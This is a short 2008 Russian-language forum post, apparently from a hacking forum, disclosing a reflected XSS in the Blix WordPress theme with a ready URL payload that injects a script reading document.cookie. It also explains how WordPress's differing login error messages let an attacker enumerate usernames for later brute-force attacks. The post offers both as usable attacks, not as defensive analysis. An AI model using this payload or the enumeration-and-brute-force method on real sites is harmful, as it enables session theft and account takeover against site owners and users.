
04.05.2008, 00:00
|
|
Новичок
Регистрация: 03.05.2008
Сообщений: 15
Провел на форуме: 258071
Репутация:
24
|
|
Активная XSS в Blix Theme, которую сейчас часто ставят на WP.
Код:
http://site/index.php/%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
еще одна - Abuse of Functionality, действует как на старых версиях, так и на новой 2.5 - суть в том, что при вводе верного и неверного логина(при неверном пароле) движок выводит разное уведомление об ошибке, т.е. методом перебора возможно получить логины пользователей, которые потом использовать при брутфорсе.
Последний раз редактировалось exclus!ve; 04.05.2008 в 02:12..
|
|
|